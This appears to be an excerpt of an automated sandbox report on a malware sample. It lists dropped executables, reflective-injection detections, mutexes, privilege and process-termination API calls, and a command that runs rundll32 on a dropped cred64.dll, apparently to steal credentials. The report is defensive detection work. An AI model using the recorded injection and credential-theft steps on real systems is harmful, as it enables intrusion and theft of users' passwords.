                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690021F3016_2_00007FF690021F30
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690032F2016_2_00007FF690032F20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69001979B16_2_00007FF69001979B
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690019FCD16_2_00007FF690019FCD
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002504016_2_00007FF690025040
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002107416_2_00007FF690021074
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002D88016_2_00007FF69002D880
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900228C016_2_00007FF6900228C0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8372A6816_2_00007FF8B8372A68
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B831DAC016_2_00007FF8B831DAC0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8305B5C16_2_00007FF8B8305B5C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830FBE016_2_00007FF8B830FBE0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8372C4816_2_00007FF8B8372C48
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8367BFC16_2_00007FF8B8367BFC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83A5E6416_2_00007FF8B83A5E64
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83A8DF816_2_00007FF8B83A8DF8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8330E1516_2_00007FF8B8330E15
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830FF6016_2_00007FF8B830FF60
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8302FA016_2_00007FF8B8302FA0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832F00016_2_00007FF8B832F000
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830D03016_2_00007FF8B830D030
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83900BC16_2_00007FF8B83900BC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B831D12016_2_00007FF8B831D120
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830327416_2_00007FF8B8303274
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832120016_2_00007FF8B8321200
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83262D016_2_00007FF8B83262D0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830C36016_2_00007FF8B830C360
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B831030016_2_00007FF8B8310300
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830831016_2_00007FF8B8308310
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830233C16_2_00007FF8B830233C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832238416_2_00007FF8B8322384
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832C42916_2_00007FF8B832C429
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830F52016_2_00007FF8B830F520
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B831F5A416_2_00007FF8B831F5A4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83116D016_2_00007FF8B83116D0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B834274016_2_00007FF8B8342740
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83026F816_2_00007FF8B83026F8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B830885416_2_00007FF8B8308854
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B83128B016_2_00007FF8B83128B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB63CF016_2_00007FF8BFB63CF0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB637B016_2_00007FF8BFB637B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB61A8016_2_00007FF8BFB61A80
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB6521C16_2_00007FF8BFB6521C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB6263016_2_00007FF8BFB62630
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB61A8016_2_00007FF8BFB61A80
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB6314016_2_00007FF8BFB63140
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB62D3016_2_00007FF8BFB62D30
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB76AE416_2_00007FF8BFB76AE4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB72DD016_2_00007FF8BFB72DD0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB971CC16_2_00007FF8BFB971CC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB9D13016_2_00007FF8BFB9D130
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeCode function: 17_2_00F0DC7417_2_00F0DC74
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006961F018_2_006961F0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006D63C418_2_006D63C4
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006D64E418_2_006D64E4
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006D473718_2_006D4737
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006CCDCD18_2_006CCDCD
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_00694EF018_2_00694EF0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006951A018_2_006951A0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006C331018_2_006C3310
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_0069545018_2_00695450
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006CD55918_2_006CD559
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BBBB018_2_006BBBB0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BFDCB18_2_006BFDCB
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006D1FC718_2_006D1FC7
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007AB70019_2_007AB700
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007A61F019_2_007A61F0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007A51A019_2_007A51A0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007D331019_2_007D3310
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007E63C419_2_007E63C4
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007A545019_2_007A5450
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007E64E419_2_007E64E4
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007DD55919_2_007DD559
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007E473719_2_007E4737
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CBBB019_2_007CBBB0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007DCDCD19_2_007DCDCD
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007CFDCB19_2_007CFDCB
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007A4EF019_2_007A4EF0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007E1FC719_2_007E1FC7
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007A61F020_2_007A61F0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007B2B8020_2_007B2B80
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007AB70020_2_007AB700
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007E63C420_2_007E63C4
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007E64E420_2_007E64E4
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007E473720_2_007E4737
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007A4EF020_2_007A4EF0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007A51A020_2_007A51A0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007D331020_2_007D3310
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007A545020_2_007A5450
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007DD55920_2_007DD559
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CBBB020_2_007CBBB0
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007CFDCB20_2_007CFDCB
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_697131B029_2_697131B0
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_69721AB129_2_69721AB1
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: String function: 006B4640 appears 136 times
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: String function: 006BAC60 appears 56 times
                              Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF7E52B1050 appears 106 times
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: String function: 00007FF690012760 appears 36 times
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: String function: 00007FF6900125F0 appears 100 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007D2B28 appears 52 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007CAC60 appears 112 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007C4640 appears 272 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007CA414 appears 76 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007D8B3C appears 34 times
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 007C3730 appears 54 times
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: String function: 00007FF6743D1050 appears 106 times
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: String function: 00007FF79E381050 appears 106 times
                              Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF7179D1050 appears 106 times
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 69715D90 appears 103 times
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 697173B0 appears 34 times
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 69716B05 appears 47 times
                              Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF7A91B1050 appears 106 times
                              Source: api-ms-win-core-localization-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-util-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-console-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-synch-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-file-l2-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-synch-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-timezone-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-namedpipe-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-datetime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-locale-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-convert-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-conio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-time-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-memory-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-handle-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-runtime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-process-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-sysinfo-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-filesystem-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-errorhandling-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-processthreads-l1-1-1.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-utility-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-profile-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-processthreads-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-processenvironment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-environment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-interlocked-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-debug-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-stdio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-libraryloader-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-file-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-file-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-math-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-crt-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
                              Source: yINR7uQlPr.exeBinary or memory string: OriginalFilename vs yINR7uQlPr.exe
                              Source: yINR7uQlPr.exe, 00000000.00000003.2045354787.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
                              Source: yINR7uQlPr.exe, 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
                              Source: yINR7uQlPr.exe, 00000000.00000003.2045212282.0000000002B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
                              Source: yINR7uQlPr.exe, 00000000.00000003.2045283646.0000000002B90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs yINR7uQlPr.exe
                              Source: 4.0.explorer.exe.3320000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 1.2.svchost.exe.17002c7d000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.0.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.9820000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.3320000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.9820000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.ca78220.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 1.2.svchost.exe.17002c7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 4.2.explorer.exe.ca78220.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@76/87@0/2
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900129E0 GetLastError,FormatMessageW,MessageBoxW,11_2_00007FF6900129E0
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E384264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF79E384264
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E3840E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,0_2_00007FF79E3840E4
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,1_2_00007FF7E52B4264
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,1_2_00007FF7E52B40E4
                              Source: C:\Windows\explorer.exeCode function: 4_2_09823270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,4_2_09823270
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_00007FF6743D4264
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,6_2_00007FF6743D40E4
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,8_2_00007FF7A91B4264
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,8_2_00007FF7A91B40E4
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179D4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,9_2_00007FF7179D4264
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179D40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,9_2_00007FF7179D40E4
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E383E24 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF79E383E24
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_007AE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,20_2_007AE8D0
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeFile created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942Jump to behavior
                              Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                              Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                              Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\43266f2abbf198987ad62d4962cf7134
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
                              Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CC11.tmpJump to behavior
                              Source: yINR7uQlPr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                              Source: rundll32.exe, 00000016.00000002.2679991024.000001ED56728000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: yINR7uQlPr.exeVirustotal: Detection: 40%
